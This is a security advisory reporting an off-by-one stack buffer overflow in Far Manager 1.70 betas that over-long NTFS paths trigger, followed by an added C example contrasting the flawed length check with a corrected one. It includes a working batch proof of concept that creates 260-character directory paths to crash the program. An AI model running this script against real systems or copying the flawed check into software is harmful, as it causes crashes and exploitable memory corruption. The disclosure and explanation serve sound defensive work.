COMMAND

    Far buffer overflow

SYSTEMS AFFECTED

    RARSoft Far Manager 1.70beta1 and prior

PROBLEM

    In 3APA3A [3APA3A@SECURITY.NNOV.RU] advisory:

        http://www.security.nnov.ru

    --snip--

    The NTFS file system allows creating paths of almost unlimited
    length, but the Windows API does not allow paths longer than 256
    bytes. To prevent the Windows API from checking the requested path,
    the \\?\ prefix may be added to the filename. This is a documented
    feature of the Windows API.

    Paths longer than 260 characters will cause FAR to crash.

    Far 1.70beta4 implements a check of the path length and does not
    allow the use of paths longer than 160 characters. But due to a
    coding bug it is still possible to exploit FAR by using a path of
    exactly 260 characters (off-by-one stack pointer overflow).

    Exploit
    =======

    This .bat file demonstrates the vulnerability (it creates a directory
    with 2 subdirectories; the first one will cause Far 1.70beta1 to
    crash, the second one will cause Far 1.70beta4 to crash).

    @echo off
    REM A and B are filler strings used as directory names
    SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
    REM Parent directory, created through the \\?\ prefix
    mkdir \\?\c:\%A%
    REM First subdirectory (crashes Far 1.70beta1)
    mkdir \\?\c:\%A%\%A%
    REM Second subdirectory (crashes Far 1.70beta4)
    mkdir \\?\c:\%A%\%B%\

    --snap--

SOLUTION

    Will be patched in 1.70beta5 when released
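
The boundary condition the advisory describes (a length check that still lets a path of exactly 260 characters through) is shown below as an added example; it is not Far Manager's code, which the advisory does not include. The 260-byte buffer size and the names PATH_BUF, flawed_accepts, safe_copy_path and fill_path are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define PATH_BUF 260 /* assumption: buffer sized like Windows MAX_PATH */

/* Hypothetical flawed check: accepts exactly PATH_BUF characters, although
   the terminating NUL then needs byte PATH_BUF + 1. No copy is performed. */
int flawed_accepts(const char *path) {
    return strlen(path) <= PATH_BUF;
}

/* Corrected copy: the NUL must fit too; reject rather than truncate. */
int safe_copy_path(char *dst, size_t dst_size, const char *path) {
    size_t len;
    if (dst == NULL || path == NULL || dst_size == 0)
        return -1;
    len = strlen(path);
    if (len >= dst_size)
        return -1;
    memcpy(dst, path, len + 1); /* len + 1 <= dst_size */
    return 0;
}

/* Constructed sample input: n filler characters plus the NUL. */
void fill_path(char *out, size_t n) {
    memset(out, 'A', n);
    out[n] = '\0';
}

int main(void) {
    char src[PATH_BUF + 2], dst[PATH_BUF];
    size_t n;
    for (n = PATH_BUF - 1; n <= PATH_BUF + 1; n++) {
        fill_path(src, n);
        printf("%lu chars: flawed=%d safe=%d\n", (unsigned long)n,
               flawed_accepts(src), safe_copy_path(dst, sizeof dst, src));
    }
    return 0;
}
```

A file manager enumerating directories created through the \\?\ prefix has to treat over-long names as an expected input and skip or report them, which is why the corrected routine returns an error instead of truncating.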